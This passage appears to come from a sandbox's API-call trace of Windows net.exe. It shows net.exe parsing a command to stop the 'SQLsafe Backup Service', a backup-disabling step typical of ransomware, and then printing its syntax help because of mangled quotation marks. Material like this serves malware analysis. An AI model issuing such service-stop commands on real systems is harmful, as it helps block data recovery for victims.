_String2="ΓÇ£SQLsafe") returned -832 [0207.216] _wcsicmp (_String1="stats", _String2="ΓÇ£SQLsafe") returned -832 [0207.216] _wcsicmp (_String1="statistics", _String2="ΓÇ£SQLsafe") returned -832 [0207.216] _wcsicmp (_String1="stop", _String2="ΓÇ£SQLsafe") returned -832 [0207.216] _wcsicmp (_String1="time", _String2="ΓÇ£SQLsafe") returned -831 [0207.217] _wcsicmp (_String1="user", _String2="ΓÇ£SQLsafe") returned -830 [0207.217] _wcsicmp (_String1="users", _String2="ΓÇ£SQLsafe") returned -830 [0207.217] _wcsicmp (_String1="msg", _String2="ΓÇ£SQLsafe") returned -838 [0207.217] _wcsicmp (_String1="messenger", _String2="ΓÇ£SQLsafe") returned -838 [0207.217] _wcsicmp (_String1="receiver", _String2="ΓÇ£SQLsafe") returned -833 [0207.217] _wcsicmp (_String1="rcv", _String2="ΓÇ£SQLsafe") returned -833 [0207.217] _wcsicmp (_String1="netpopup", _String2="ΓÇ£SQLsafe") returned -837 [0207.217] _wcsicmp (_String1="redirector", _String2="ΓÇ£SQLsafe") returned -833 [0207.217] _wcsicmp (_String1="redir", _String2="ΓÇ£SQLsafe") returned -833 [0207.217] _wcsicmp (_String1="rdr", _String2="ΓÇ£SQLsafe") returned -833 [0207.217] _wcsicmp (_String1="workstation", _String2="ΓÇ£SQLsafe") returned -828 [0207.217] _wcsicmp (_String1="work", _String2="ΓÇ£SQLsafe") returned -828 [0207.217] _wcsicmp (_String1="wksta", _String2="ΓÇ£SQLsafe") returned -828 [0207.217] _wcsicmp (_String1="prdr", _String2="ΓÇ£SQLsafe") returned -835 [0207.217] _wcsicmp (_String1="devrdr", _String2="ΓÇ£SQLsafe") returned -847 [0207.217] _wcsicmp (_String1="lanmanworkstation", _String2="ΓÇ£SQLsafe") returned -839 [0207.217] _wcsicmp (_String1="server", _String2="ΓÇ£SQLsafe") returned -832 [0207.217] _wcsicmp (_String1="svr", _String2="ΓÇ£SQLsafe") returned -832 [0207.217] _wcsicmp (_String1="srv", _String2="ΓÇ£SQLsafe") returned -832 [0207.217] _wcsicmp (_String1="lanmanserver", _String2="ΓÇ£SQLsafe") returned -839 [0207.217] _wcsicmp (_String1="alerter", _String2="ΓÇ£SQLsafe") returned -850 [0207.217] _wcsicmp (_String1="netlogon", _String2="ΓÇ£SQLsafe") returned -837 [0207.217] _wcsicmp (_String1="accounts", _String2="Backup") returned -1 [0207.217] _wcsicmp (_String1="computer", _String2="Backup") returned 1 [0207.217] _wcsicmp (_String1="config", _String2="Backup") returned 1 [0207.217] _wcsicmp (_String1="continue", _String2="Backup") returned 1 [0207.218] _wcsicmp (_String1="cont", _String2="Backup") returned 1 [0207.218] _wcsicmp (_String1="file", _String2="Backup") returned 4 [0207.218] _wcsicmp (_String1="files", _String2="Backup") returned 4 [0207.218] _wcsicmp (_String1="group", _String2="Backup") returned 5 [0207.218] _wcsicmp (_String1="groups", _String2="Backup") returned 5 [0207.218] _wcsicmp (_String1="help", _String2="Backup") returned 6 [0207.218] _wcsicmp (_String1="helpmsg", _String2="Backup") returned 6 [0207.218] _wcsicmp (_String1="localgroup", _String2="Backup") returned 10 [0207.218] _wcsicmp (_String1="pause", _String2="Backup") returned 14 [0207.218] _wcsicmp (_String1="session", _String2="Backup") returned 17 [0207.218] _wcsicmp (_String1="sessions", _String2="Backup") returned 17 [0207.218] _wcsicmp (_String1="sess", _String2="Backup") returned 17 [0207.218] _wcsicmp (_String1="share", _String2="Backup") returned 17 [0207.218] _wcsicmp (_String1="start", _String2="Backup") returned 17 [0207.218] _wcsicmp (_String1="stats", _String2="Backup") returned 17 [0207.218] _wcsicmp (_String1="statistics", _String2="Backup") returned 17 [0207.218] _wcsicmp (_String1="stop", _String2="Backup") returned 17 [0207.218] _wcsicmp (_String1="time", _String2="Backup") returned 18 [0207.218] _wcsicmp (_String1="user", _String2="Backup") returned 19 [0207.218] _wcsicmp (_String1="users", _String2="Backup") returned 19 [0207.218] _wcsicmp (_String1="msg", _String2="Backup") returned 11 [0207.218] _wcsicmp (_String1="messenger", _String2="Backup") returned 11 [0207.218] _wcsicmp (_String1="receiver", _String2="Backup") returned 16 [0207.218] _wcsicmp (_String1="rcv", _String2="Backup") returned 16 [0207.218] _wcsicmp (_String1="netpopup", _String2="Backup") returned 12 [0207.218] _wcsicmp (_String1="redirector", _String2="Backup") returned 16 [0207.218] _wcsicmp (_String1="redir", _String2="Backup") returned 16 [0207.218] _wcsicmp (_String1="rdr", _String2="Backup") returned 16 [0207.218] _wcsicmp (_String1="workstation", _String2="Backup") returned 21 [0207.218] _wcsicmp (_String1="work", _String2="Backup") returned 21 [0207.218] _wcsicmp (_String1="wksta", _String2="Backup") returned 21 [0207.218] _wcsicmp (_String1="prdr", _String2="Backup") returned 14 [0207.218] _wcsicmp (_String1="devrdr", _String2="Backup") returned 2 [0207.218] _wcsicmp (_String1="lanmanworkstation", _String2="Backup") returned 10 [0207.218] _wcsicmp (_String1="server", _String2="Backup") returned 17 [0207.218] _wcsicmp (_String1="svr", _String2="Backup") returned 17 [0207.218] _wcsicmp (_String1="srv", _String2="Backup") returned 17 [0207.218] _wcsicmp (_String1="lanmanserver", _String2="Backup") returned 10 [0207.219] _wcsicmp (_String1="alerter", _String2="Backup") returned -1 [0207.219] _wcsicmp (_String1="netlogon", _String2="Backup") returned 12 [0207.219] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0207.219] SetThreadUILanguage (LangId=0x0) returned 0x409 [0207.219] wcscpy_s (in: _Destination=0x39f504, _SizeInWords=0xf, _Source="neth.dll" | out: _Destination="neth.dll") returned 0x0 [0207.219] LoadLibraryW (lpLibFileName="neth.dll") returned 0x74a10000 [0207.220] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc66, dwLanguageId=0x0, lpBuffer=0x39f500, nSize=0x0, Arguments=0x39f4fc | out: lpBuffer="叨Dneth.dll") returned 0xff [0207.222] wcstok (in: _String="CONTINUE: CONT$\r\nFILE: FILES$\r\nGROUP: GROUPS$\r\nREPLICATOR: REPL, REPLICATOR$\r\nSESSION: SESSIONS, SESS$\r\nSTATISTICS: STATS$\r\nUSER: USERS$\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR$\r\nSERVER: SVR, SRV$\r\n", _Delimiter="$", _Context=0x3d6 | out: _String="CONTINUE: CONT", _Context=0x3d6) returned="CONTINUE: CONT" [0207.222] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nFILE: FILES" [0207.222] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nGROUP: GROUPS" [0207.222] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nREPLICATOR: REPL, REPLICATOR" [0207.222] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSESSION: SESSIONS, SESS" [0207.222] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSTATISTICS: STATS" [0207.222] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nUSER: USERS" [0207.222] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR" [0207.222] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSERVER: SVR, SRV" [0207.222] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\n" [0207.222] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0207.222] wcstok (in: _String="CONTINUE: CONT", _Delimiter=":,$", _Context=0x3d6 | out: _String="CONTINUE", _Context=0x3d6) returned="CONTINUE" [0207.222] wcsspn (_String="CONTINUE", _Control="\x09\n\x0b\x0c\r ") returned 0x0 [0207.222] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" CONT" [0207.222] wcsspn (_String=" CONT", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0207.222] _wcsicmp (_String1="CONT", _String2="stop") returned -16 [0207.222] _wcsicmp (_String1="CONT", _String2="ΓÇ£SQLsafe") returned -848 [0207.222] _wcsicmp (_String1="CONT", _String2="Backup") returned 1 [0207.222] _wcsicmp (_String1="CONT", _String2="ServiceΓÇ¥") returned -16 [0207.222] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0207.222] wcstok (in: _String="\r\nFILE: FILES", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nFILE", _Context=0x3d6) returned="\r\nFILE" [0207.222] wcsspn (_String="\r\nFILE", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0207.222] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" FILES" [0207.222] wcsspn (_String=" FILES", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0207.222] _wcsicmp (_String1="FILES", _String2="stop") returned -13 [0207.223] _wcsicmp (_String1="FILES", _String2="ΓÇ£SQLsafe") returned -845 [0207.223] _wcsicmp (_String1="FILES", _String2="Backup") returned 4 [0207.223] _wcsicmp (_String1="FILES", _String2="ServiceΓÇ¥") returned -13 [0207.223] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0207.223] wcstok (in: _String="\r\nGROUP: GROUPS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nGROUP", _Context=0x3d6) returned="\r\nGROUP" [0207.223] wcsspn (_String="\r\nGROUP", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0207.223] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" GROUPS" [0207.223] wcsspn (_String=" GROUPS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0207.223] _wcsicmp (_String1="GROUPS", _String2="stop") returned -12 [0207.223] _wcsicmp (_String1="GROUPS", _String2="ΓÇ£SQLsafe") returned -844 [0207.223] _wcsicmp (_String1="GROUPS", _String2="Backup") returned 5 [0207.223] _wcsicmp (_String1="GROUPS", _String2="ServiceΓÇ¥") returned -12 [0207.223] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0207.223] wcstok (in: _String="\r\nREPLICATOR: REPL, REPLICATOR", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nREPLICATOR", _Context=0x3d6) returned="\r\nREPLICATOR" [0207.223] wcsspn (_String="\r\nREPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0207.223] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REPL" [0207.223] wcsspn (_String=" REPL", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0207.223] _wcsicmp (_String1="REPL", _String2="stop") returned -1 [0207.223] _wcsicmp (_String1="REPL", _String2="ΓÇ£SQLsafe") returned -833 [0207.223] _wcsicmp (_String1="REPL", _String2="Backup") returned 16 [0207.223] _wcsicmp (_String1="REPL", _String2="ServiceΓÇ¥") returned -1 [0207.223] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REPLICATOR" [0207.223] wcsspn (_String=" REPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0207.223] _wcsicmp (_String1="REPLICATOR", _String2="stop") returned -1 [0207.223] _wcsicmp (_String1="REPLICATOR", _String2="ΓÇ£SQLsafe") returned -833 [0207.223] _wcsicmp (_String1="REPLICATOR", _String2="Backup") returned 16 [0207.223] _wcsicmp (_String1="REPLICATOR", _String2="ServiceΓÇ¥") returned -1 [0207.223] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0207.223] wcstok (in: _String="\r\nSESSION: SESSIONS, SESS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSESSION", _Context=0x3d6) returned="\r\nSESSION" [0207.223] wcsspn (_String="\r\nSESSION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0207.223] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SESSIONS" [0207.223] wcsspn (_String=" SESSIONS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0207.223] _wcsicmp (_String1="SESSIONS", _String2="stop") returned -15 [0207.223] _wcsicmp (_String1="SESSIONS", _String2="ΓÇ£SQLsafe") returned -832 [0207.223] _wcsicmp (_String1="SESSIONS", _String2="Backup") returned 17 [0207.224] _wcsicmp (_String1="SESSIONS", _String2="ServiceΓÇ¥") returned 1 [0207.224] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SESS" [0207.224] wcsspn (_String=" SESS", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0207.224] _wcsicmp (_String1="SESS", _String2="stop") returned -15 [0207.224] _wcsicmp (_String1="SESS", _String2="ΓÇ£SQLsafe") returned -832 [0207.224] _wcsicmp (_String1="SESS", _String2="Backup") returned 17 [0207.224] _wcsicmp (_String1="SESS", _String2="ServiceΓÇ¥") returned 1 [0207.224] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0207.224] wcstok (in: _String="\r\nSTATISTICS: STATS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSTATISTICS", _Context=0x3d6) returned="\r\nSTATISTICS" [0207.224] wcsspn (_String="\r\nSTATISTICS", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0207.224] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" STATS" [0207.224] wcsspn (_String=" STATS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0207.224] _wcsicmp (_String1="STATS", _String2="stop") returned -14 [0207.224] _wcsicmp (_String1="STATS", _String2="ΓÇ£SQLsafe") returned -832 [0207.224] _wcsicmp (_String1="STATS", _String2="Backup") returned 17 [0207.224] _wcsicmp (_String1="STATS", _String2="ServiceΓÇ¥") returned 15 [0207.224] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0207.224] wcstok (in: _String="\r\nUSER: USERS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nUSER", _Context=0x3d6) returned="\r\nUSER" [0207.224] wcsspn (_String="\r\nUSER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0207.224] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" USERS" [0207.224] wcsspn (_String=" USERS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0207.224] _wcsicmp (_String1="USERS", _String2="stop") returned 2 [0207.224] _wcsicmp (_String1="USERS", _String2="ΓÇ£SQLsafe") returned -830 [0207.224] _wcsicmp (_String1="USERS", _String2="Backup") returned 19 [0207.224] _wcsicmp (_String1="USERS", _String2="ServiceΓÇ¥") returned 2 [0207.224] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0207.224] wcstok (in: _String="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nWORKSTATION", _Context=0x3d6) returned="\r\nWORKSTATION" [0207.224] wcsspn (_String="\r\nWORKSTATION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0207.224] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REDIRECTOR" [0207.224] wcsspn (_String=" REDIRECTOR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0207.224] _wcsicmp (_String1="REDIRECTOR", _String2="stop") returned -1 [0207.224] _wcsicmp (_String1="REDIRECTOR", _String2="ΓÇ£SQLsafe") returned -833 [0207.224] _wcsicmp (_String1="REDIRECTOR", _String2="Backup") returned 16 [0207.224] _wcsicmp (_String1="REDIRECTOR", _String2="ServiceΓÇ¥") returned -1 [0207.224] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REDIR" [0207.224] wcsspn (_String=" REDIR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0207.225] _wcsicmp (_String1="REDIR", _String2="stop") returned -1 [0207.225] _wcsicmp (_String1="REDIR", _String2="ΓÇ£SQLsafe") returned -833 [0207.225] _wcsicmp (_String1="REDIR", _String2="Backup") returned 16 [0207.225] _wcsicmp (_String1="REDIR", _String2="ServiceΓÇ¥") returned -1 [0207.225] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" RDR" [0207.225] wcsspn (_String=" RDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0207.225] _wcsicmp (_String1="RDR", _String2="stop") returned -1 [0207.225] _wcsicmp (_String1="RDR", _String2="ΓÇ£SQLsafe") returned -833 [0207.225] _wcsicmp (_String1="RDR", _String2="Backup") returned 16 [0207.225] _wcsicmp (_String1="RDR", _String2="ServiceΓÇ¥") returned -1 [0207.225] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" WORK" [0207.225] wcsspn (_String=" WORK", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0207.225] _wcsicmp (_String1="WORK", _String2="stop") returned 4 [0207.225] _wcsicmp (_String1="WORK", _String2="ΓÇ£SQLsafe") returned -828 [0207.225] _wcsicmp (_String1="WORK", _String2="Backup") returned 21 [0207.225] _wcsicmp (_String1="WORK", _String2="ServiceΓÇ¥") returned 4 [0207.225] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" WKSTA" [0207.225] wcsspn (_String=" WKSTA", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0207.225] _wcsicmp (_String1="WKSTA", _String2="stop") returned 4 [0207.225] _wcsicmp (_String1="WKSTA", _String2="ΓÇ£SQLsafe") returned -828 [0207.225] _wcsicmp (_String1="WKSTA", _String2="Backup") returned 21 [0207.225] _wcsicmp (_String1="WKSTA", _String2="ServiceΓÇ¥") returned 4 [0207.225] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" PRDR" [0207.225] wcsspn (_String=" PRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0207.225] _wcsicmp (_String1="PRDR", _String2="stop") returned -3 [0207.225] _wcsicmp (_String1="PRDR", _String2="ΓÇ£SQLsafe") returned -835 [0207.225] _wcsicmp (_String1="PRDR", _String2="Backup") returned 14 [0207.225] _wcsicmp (_String1="PRDR", _String2="ServiceΓÇ¥") returned -3 [0207.225] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" DEVRDR" [0207.225] wcsspn (_String=" DEVRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0207.225] _wcsicmp (_String1="DEVRDR", _String2="stop") returned -15 [0207.225] _wcsicmp (_String1="DEVRDR", _String2="ΓÇ£SQLsafe") returned -847 [0207.225] _wcsicmp (_String1="DEVRDR", _String2="Backup") returned 2 [0207.225] _wcsicmp (_String1="DEVRDR", _String2="ServiceΓÇ¥") returned -15 [0207.225] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0207.225] wcstok (in: _String="\r\nSERVER: SVR, SRV", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSERVER", _Context=0x3d6) returned="\r\nSERVER" [0207.226] wcsspn (_String="\r\nSERVER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0207.226] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SVR" [0207.226] wcsspn (_String=" SVR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0207.226] _wcsicmp (_String1="SVR", _String2="stop") returned 2 [0207.226] _wcsicmp (_String1="SVR", _String2="ΓÇ£SQLsafe") returned -832 [0207.226] _wcsicmp (_String1="SVR", _String2="Backup") returned 17 [0207.226] _wcsicmp (_String1="SVR", _String2="ServiceΓÇ¥") returned 17 [0207.226] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SRV" [0207.226] wcsspn (_String=" SRV", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0207.226] _wcsicmp (_String1="SRV", _String2="stop") returned -2 [0207.226] _wcsicmp (_String1="SRV", _String2="ΓÇ£SQLsafe") returned -832 [0207.226] _wcsicmp (_String1="SRV", _String2="Backup") returned 17 [0207.226] _wcsicmp (_String1="SRV", _String2="ServiceΓÇ¥") returned 13 [0207.226] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0207.226] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc67, dwLanguageId=0x0, lpBuffer=0x39f500, nSize=0x0, Arguments=0x39f4fc | out: lpBuffer="嗰Dꔺ瓡") returned 0x1c [0207.226] wcstok (in: _String="NAMES$\r\nSYNTAX$\r\nSERVICES$\r\n", _Delimiter="$", _Context=0x3d6 | out: _String="NAMES", _Context=0x3d6) returned="NAMES" [0207.226] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSYNTAX" [0207.226] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSERVICES" [0207.226] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\n" [0207.226] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0207.226] wcsspn (_String="NAMES", _Control="\x09\n\x0b\x0c\r ") returned 0x0 [0207.226] _wcsicmp (_String1="stop", _String2="NAMES") returned 5 [0207.226] wcsspn (_String="\r\nSYNTAX", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0207.226] _wcsicmp (_String1="stop", _String2="SYNTAX") returned -5 [0207.226] wcsspn (_String="\r\nSERVICES", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0207.226] _wcsicmp (_String1="stop", _String2="SERVICES") returned 15 [0207.226] wcscpy_s (in: _Destination=0x2fa4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0207.227] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a00000 [0207.227] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a00000, dwMessageId=0x111d, dwLanguageId=0x0, lpBuffer=0x2fb338, nSize=0x800, Arguments=0x2f9dd8 | out: lpBuffer="The syntax of this command is:\r\n") returned 0x20 [0207.228] GetFileType (hFile=0x26c) returned 0x3 [0207.228] LocalAlloc (uFlags=0x0, uBytes=0x40) returned 0x443c18 [0207.228] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The syntax of this command is:\r\n", cchWideChar=32, lpMultiByteStr=0x443c18, cbMultiByte=64, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The syntax of this command is:\r\n", lpUsedDefaultChar=0x0) returned 32 [0207.228] WriteFile (in: hFile=0x26c, lpBuffer=0x443c18, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x39f4e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x39f4e0, lpOverlapped=0x0) returned 0 [0207.228] LocalFree (hMem=0x443c18) returned 0x0 [0207.228] GetFileType (hFile=0x26c) returned 0x3 [0207.228] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x443920 [0207.228] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x443920, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nD", lpUsedDefaultChar=0x0) returned 2 [0207.228] WriteFile (in: hFile=0x26c, lpBuffer=0x443920, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x39f4e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x39f4e0, lpOverlapped=0x0) returned 0 [0207.228] LocalFree (hMem=0x443920) returned 0x0 [0207.228] wcscpy_s (in: _Destination=0x39f598, _SizeInWords=0x200, _Source="NET" | out: _Destination="NET") returned 0x0 [0207.228] wcsncat_s (in: _Destination="NET", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET ") returned 0x0 [0207.228] wcsncat_s (in: _Destination="NET ", _SizeInWords=0x200, _Source="stop", _MaxCount=0xffffffff | out: _Destination="NET stop") returned 0x0 [0207.228] wcsncat_s (in: _Destination="NET stop", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ") returned 0x0 [0207.228] wcsncat_s (in: _Destination="NET stop ", _SizeInWords=0x200, _Source="ΓÇ£SQLsafe", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£SQLsafe") returned 0x0 [0207.228] wcsncat_s (in: _Destination="NET stop ΓÇ£SQLsafe", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£SQLsafe ") returned 0x0 [0207.228] wcsncat_s (in: _Destination="NET stop ΓÇ£SQLsafe ", _SizeInWords=0x200, _Source="Backup", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£SQLsafe Backup") returned 0x0 [0207.228] wcsncat_s (in: _Destination="NET stop ΓÇ£SQLsafe Backup", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£SQLsafe Backup ") returned 0x0 [0207.228] wcsncat_s (in: _Destination="NET stop ΓÇ£SQLsafe Backup ", _SizeInWords=0x200, _Source="ServiceΓÇ¥", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£SQLsafe Backup ServiceΓÇ¥") returned 0x0 [0207.228] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D댸/9Ѱ/ɬ") returned 0xad [0207.229] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup ServiceΓÇ¥", _String2="NET ACCOUNTS\r\n[/FORCELOGOFF:{minutes ", _MaxCount=0x25) returned 18 [0207.229] LocalFree (hMem=0x445638) returned 0x0 [0207.229] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x2e [0207.229] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup ServiceΓÇ¥", _String2="NET COMPUTER\r\n\\\\computername {/ADD | ", _MaxCount=0x25) returned 16 [0207.229] LocalFree (hMem=0x445638) returned 0x0 [0207.229] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x7d [0207.229] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup ServiceΓÇ¥", _String2="NET CONFIG SERVER\r\n[/AUTODISCONNECT:t", _MaxCount=0x25) returned 16 [0207.229] LocalFree (hMem=0x445638) returned 0x0 [0207.229] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x26 [0207.229] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup ServiceΓÇ¥", _String2="NET CONFIG\r\n[SERVER | WORKSTATION]\r\n\r", _MaxCount=0x25) returned 16 [0207.229] LocalFree (hMem=0x445638) returned 0x0 [0207.229] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x19 [0207.229] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup ServiceΓÇ¥", _String2="NET CONTINUE\r\nservice\r\n\r\n", _MaxCount=0x25) returned 16 [0207.229] LocalFree (hMem=0x445638) returned 0x0 